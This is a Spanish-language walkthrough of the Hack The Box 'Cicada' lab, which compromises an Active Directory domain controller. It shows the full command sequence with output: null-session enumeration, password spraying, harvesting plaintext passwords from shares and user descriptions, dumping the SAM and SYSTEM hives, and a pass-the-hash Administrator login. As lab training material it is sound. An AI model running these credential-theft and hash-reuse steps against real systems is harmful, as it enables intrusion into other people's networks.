Descripción
Cicada es una máquina fácil de Hack The Box que cuenta con las siguientes vulnerabilidades:
- Enumeración del Controlador de Dominio utilizando una sesión nula
- Recuperación de credenciales de usuario desde una carpeta accesible con una sesión nula
- Enumeración del Controlador de Dominio utilizando una cuenta de dominio
- Recuperación de credenciales de usuario desde la descripción de un usuario del dominio
- Recuperación de credenciales de usuario desde una carpeta accesible con una cuenta de dominio
- Acceso inicial a la máquina con una cuenta de dominio que pertenece al grupo
Remote Management Users - Escalada de privilegios mediante un volcado de la base de datos SAM utilizando una cuenta de dominio con el privilegio
SeBackupPrivilege
Reconocimiento
Primero, vamos a comprobar con el comando ping si la máquina está activa y el sistema operativo. La dirección IP de la máquina de destino es 10.129.209.245.
$ ping -c 3 10.129.209.245
PING 10.129.209.245 (10.129.209.245) 56(84) bytes of data.
64 bytes from 10.129.209.245: icmp_seq=1 ttl=127 time=44.9 ms
64 bytes from 10.129.209.245: icmp_seq=2 ttl=127 time=44.5 ms
64 bytes from 10.129.209.245: icmp_seq=3 ttl=127 time=44.0 ms
--- 10.129.209.245 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2004ms
rtt min/avg/max/mdev = 44.009/44.471/44.948/0.383 ms
La máquina está activa y con el TTL equivalente a 127 (128 menos 1 salto) podemos asegurar que es una máquina basada en Windows. Ahora vamos a hacer un escaneo de puertos TCP SYN con Nmap para comprobar todos los puertos abiertos.
$ sudo nmap 10.129.209.245 -sS -oN nmap_scan
Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 10.129.209.245
Host is up (0.052s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
Nmap done: 1 IP address (1 host up) scanned in 7.78 seconds
Obtenemos muchos puertos abiertos, relacionados con un Controlador de Dominio de Active Directory.
Enumeración
Luego hacemos un escaneo más avanzado, con la detección de la versión de los servicios y el uso de scripts.
$ nmap 10.129.209.245 -Pn -sV -sC -p53,88,135,139,389,445,464,636,3268,3269 -oN nmap_scan_ports
Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 10.129.209.245
Host is up (0.047s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
|_ start_date: N/A
|_clock-skew: 7h00m02s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.68 seconds
Obtenemos los servicios relacionados con un Active Directory, específicamente el Controlador de Dominio CICADA-DC.cicada.htb. Agregamos la entrada al archivo /etc/hosts en nuestro sistema local.
$ echo "10.129.209.245 cicada.htb" | sudo tee -a /etc/hosts
Podemos empezar a enumerar y comprobar si podemos utilizar una sesión nula con la herramienta enum4linux-ng.
$ enum4linux-ng -As 10.129.209.245
ENUM4LINUX - next generation (v1.3.4)
==========================
| Target Information |
==========================
[*] Target ........... 10.129.209.245
[*] Username ......... ''
[*] Random Username .. 'wryjxord'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
...
==========================================
| RPC Session Check on 10.129.209.245 |
==========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[+] Server allows session using username 'wryjxord', password ''
[H] Rerunning enumeration with user 'wryjxord' might give more results
Vemos que podemos utilizar sesiones nulas y también un nombre de usuario aleatorio, en este caso wryjxord. Podemos volver a ejecutar la enumeración utilizando la herramienta crackmapexec para verificar las carpetas compartidas disponibles.
$ crackmapexec smb 10.129.209.245 -u 'wryjxord' -p '' --shares
SMB 10.129.209.245 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.209.245 445 CICADA-DC [+] cicada.htb\wryjxord:
SMB 10.129.209.245 445 CICADA-DC [+] Enumerated shares
SMB 10.129.209.245 445 CICADA-DC Share Permissions Remark
SMB 10.129.209.245 445 CICADA-DC ----- ----------- ------
SMB 10.129.209.245 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.209.245 445 CICADA-DC C$ Default share
SMB 10.129.209.245 445 CICADA-DC DEV
SMB 10.129.209.245 445 CICADA-DC HR READ
SMB 10.129.209.245 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.209.245 445 CICADA-DC NETLOGON Logon server share
SMB 10.129.209.245 445 CICADA-DC SYSVOL Logon server share
Encontramos la carpeta compartida DEV, que no podemos leer, y la carpeta compartida HR con permisos de lectura. Vamos a iniciar sesión en la carpeta compartida y descargar los archivos disponibles.
$ smbclient '\\10.129.209.245\HR' -U 'wryjxord%'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 13:29:09 2024
.. D 0 Thu Mar 14 13:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 19:31:48 2024
4168447 blocks of size 4096. 260699 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (7,0 KiloBytes/sec) (average 7,0 KiloBytes/sec)
Obtenemos el archivo Notice from HR.txt. En su contenido encontramos una contraseña, Cicada$M6Corpb*@Lp#nZp!8.
$ cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
Ahora que tenemos la contraseña, necesitamos descubrir nombres de usuario para hacer un ataque por “espráis de contraseñas” (password-spray). Podemos enumerar los usuarios del dominio utilizando la técnica del RID-recycling y la herramienta crackmapexec.
$ crackmapexec smb 10.129.209.245 -u 'xnfjsk' -p '' --rid-brute | grep SidTypeUser
SMB 10.129.209.245 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
Encontramos los usuarios del dominio john.smoulder, sarah.dantelia, michael.wrightson, david.orelious y emily.oscars. Vamos a hacerles un ataque por “espráis de contraseñas” (password-spray).
$ crackmapexec smb 10.129.209.245 -u users -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
SMB 10.129.209.245 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.209.245 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.209.245 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.209.245 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.209.245 445 CICADA-DC [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.209.245 445 CICADA-DC [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
Encontramos la contraseña del usuario michael.wrightson, Cicada$M6Corpb*@Lp#nZp!8. Ahora podemos utilizar la credencial para enumerar el dominio utilizando la herramienta enum4linux-ng. Podemos enumerar los usuarios del dominio y sus descripciones.
$ enum4linux-ng -As -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' 10.129.209.245
ENUM4LINUX - next generation (v1.3.4)
...
=======================================
| Users via RPC on 10.129.209.245 |
=======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 8 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 8 user(s) via 'enumdomusers'
[+] After merging user results we have 8 user(s) total:
'1104':
username: john.smoulder
name: (null)
acb: '0x00000210'
description: (null)
'1105':
username: sarah.dantelia
name: (null)
acb: '0x00000210'
description: (null)
'1106':
username: michael.wrightson
name: (null)
acb: '0x00000210'
description: (null)
'1108':
username: david.orelious
name: (null)
acb: '0x00000210'
description: Just in case I forget my password is aRt$Lp#7t*VQ!3
'1601':
username: emily.oscars
name: Emily Oscars
acb: '0x00000210'
description: (null)
'500':
username: Administrator
name: (null)
acb: '0x00000210'
description: Built-in account for administering the computer/domain
'501':
username: Guest
name: (null)
acb: '0x00000214'
description: Built-in account for guest access to the computer/domain
'502':
username: krbtgt
name: (null)
acb: '0x00020011'
description: Key Distribution Center Service Account
Encontramos la contraseña del usuario david.orelious en su descripción, aRt$Lp#7t*VQ!3. Podemos volver a enumerar el dominio para verificar las carpetas compartidas disponibles.
$ crackmapexec smb 10.129.209.245 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.129.209.245 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.209.245 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.129.209.245 445 CICADA-DC [+] Enumerated shares
SMB 10.129.209.245 445 CICADA-DC Share Permissions Remark
SMB 10.129.209.245 445 CICADA-DC ----- ----------- ------
SMB 10.129.209.245 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.209.245 445 CICADA-DC C$ Default share
SMB 10.129.209.245 445 CICADA-DC DEV READ
SMB 10.129.209.245 445 CICADA-DC HR READ
SMB 10.129.209.245 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.209.245 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.209.245 445 CICADA-DC SYSVOL READ Logon server share
Con este usuario tenemos acceso a la carpeta compartida DEV, así que nos conectamos a ella y descargamos los archivos.
$ smbclient '\\10.129.209.245\DEV' -U 'david.orelious%aRt$Lp#7t*VQ!3'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 13:31:39 2024
.. D 0 Thu Mar 14 13:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 19:28:22 2024
4168447 blocks of size 4096. 332275 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (3,3 KiloBytes/sec) (average 3,3 KiloBytes/sec)
Obtenemos el script Backup_script.ps1 que tiene las credenciales para el usuario emily.oscars con la contraseña Q!3@Lp#M6b*7t*Vt.
$ cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
Explotación
Podemos conectar a la máquina y obtener una consola utilizando el usuario emily.oscars.
$ evil-winrm -i 10.129.209.245 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami
cicada\emily.oscars
Post-Explotación
Encontramos que el usuario emily.oscars tiene el privilegio de SeBackupPrivilege.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Con este privilegio podemos volcar las áreas del registro SYSTEM y SAM y luego descargar los archivos mediante la función de descarga (download) de evil-winrm.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> reg save hklm\system system
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> reg save hklm\sam sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> download system
Info: Downloading C:\Users\emily.oscars.CICADA\system to system
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> download sam
Info: Downloading C:\Users\emily.oscars.CICADA\sam to sam
Info: Download successful!
Luego en nuestro sistema podemos utilizar la herramienta impacket-secretdump para volcar la contraseña NTLM del usuario Administrator, 2b87e7c93a3e8a0ea4a581937016f341.
$ impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
Ahora podemos utilizar la contraseña NTLM para iniciar sesión en la máquina.
$ evil-winrm -i 10.129.209.241 -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
Flags
Con la sesión del usuario Administrator podemos obtener las flags user y proof.
*Evil-WinRM* PS C:\Users\Administrator\Documents> type c:\users\emily.oscars.CICADA\Desktop\user.txt
<REDACTED>
*Evil-WinRM* PS C:\Users\Administrator\Documents> type c:\users\Administrator\Desktop\root.txt
<REDACTED>